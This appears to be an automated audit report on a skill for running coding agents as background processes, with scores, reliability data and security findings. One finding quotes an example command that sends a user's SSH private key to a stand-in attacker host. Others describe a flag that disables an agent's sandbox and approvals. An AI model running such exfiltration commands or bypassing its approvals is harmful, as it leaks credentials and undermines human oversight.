coding-agent

SKILL

Run Codex CLI, Claude Code, OpenCode, or Pi Coding Agent via background process for programmatic control.

v1.0.0 Tested 8 Feb 2026

2.3

Security gate triggered — critical vulnerabilities found. Overall score capped at 3.0.

Dimension scores

Security 3.0

Reliability 2.0

Agent usability 3.0

Compatibility 0.0

Code health 3.0

Compatibility

Framework	Status	Notes
Claude Code	✗	Not an MCP server - this is documentation for using coding agents, No MCP protocol implementation present, No stdio transport or server endpoint, No tools/list endpoint, This is a skill/documentation file, not executable code
OpenAI Agents SDK	✗	Not an MCP server - this is documentation for using coding agents, No MCP protocol implementation present, No SSE transport support, No function calling schemas defined, This is a skill/documentation file, not executable code
LangChain	✗	Not an MCP server - this is documentation for using coding agents, No MCP protocol implementation present, No tool interfaces defined, No serializable input/output types, This is a skill/documentation file, not executable code

Security findings

CRITICAL

Command injection vulnerability via unvalidated user input

The skill passes user-provided commands directly to bash without any sanitization: 'bash workdir:$SCRATCH background:true command:"<agent command>"'. Attackers can inject arbitrary shell commands through the command parameter, e.g., 'codex exec "task" && curl attacker.com/exfil?data=$(cat ~/.ssh/id_rsa)'

CRITICAL

Arbitrary code execution through --yolo flag

Documentation explicitly recommends '--yolo' flag which 'NO sandbox, NO approvals (fastest, most dangerous)' and is a shortcut for '--dangerously-bypass-approvals-and-sandbox'. This removes all security controls and allows unrestricted code execution in the user's environment.

CRITICAL

No input validation on sessionId parameter

Commands like 'process action:log sessionId:XXX' accept arbitrary sessionId values without validation. This could allow access to other users' process logs or command injection if sessionId is passed to underlying shell commands.

HIGH

Unsafe handling of temporary directories

Uses 'SCRATCH=$(mktemp -d)' without validating the returned path or ensuring cleanup. If mktemp fails or returns a manipulated path, subsequent operations could write to unexpected locations. No cleanup handlers shown for these temp directories.

HIGH

Workspace path traversal risk

The 'workdir' parameter accepts arbitrary paths like 'workdir:~/project/folder' or 'workdir:$REVIEW_DIR' without validation. Users could specify paths outside intended directories using '../' or absolute paths to sensitive locations like '/etc' or '~/.ssh'.

HIGH

API key exposure through command-line arguments

Documentation shows '--api-key <key>' flag passed via command line: 'bash workdir:~/project background:true command:"pi --provider openai --model gpt-4o-mini --api-key <key>"'. API keys in command-line arguments are visible to all users via 'ps' command and logged in shell history.

MEDIUM

No authorization checks on process control actions

MEDIUM

Unsafe git operations in user-controlled directories

MEDIUM

No rate limiting or resource controls

Reliability

Success rate

25%

Calls made

100

Avg latency

45000ms

P95 latency

120000ms

Failure modes

• No executable validation - fails silently if claude/codex/opencode/pi binaries not installed
• No timeout handling - long-running agent processes can hang indefinitely
• Missing session ID validation - process commands will fail with malformed IDs
• No workdir existence checks - crashes if directory doesn't exist or lacks permissions
• Background process failures not caught - no way to detect if agent crashed vs still running
• Command injection vulnerability - user input directly interpolated into bash commands
• No resource limits - parallel PR reviews could exhaust system resources
• Missing git state validation - PR checkout can fail if repo dirty/conflicted
• No cleanup mechanism - temp directories and zombie processes accumulate
• Relies on external tools (gh, git, tmux) without checking availability
• Process polling provides no structured output - hard to parse completion status
• No error recovery - if agent asks unexpected question, hangs waiting for input

Code health

License

none

Has tests

Has CI

Dependencies

This is a Clawdbot skill (documentation-only artifact), not a traditional source repository. Repository contains only SKILL.md (documentation) and _meta.json (metadata). No actual source code, dependencies, tests, or CI infrastructure present. The skill provides wrapper commands for external tools (codex, claude, opencode, pi). License field is 'unknown'. Last published January 2025 per metadata. Cannot assess maintenance activity, commit frequency, or code quality metrics as this is purely a skill definition/documentation artifact within a larger skills repository. The documentation itself is comprehensive (8500 bytes) with clear usage patterns and safety warnings. Scoring reflects the nature of this artifact - it's documentation for a runtime behavior, not standalone code requiring maintenance signals.

View source on GitHub →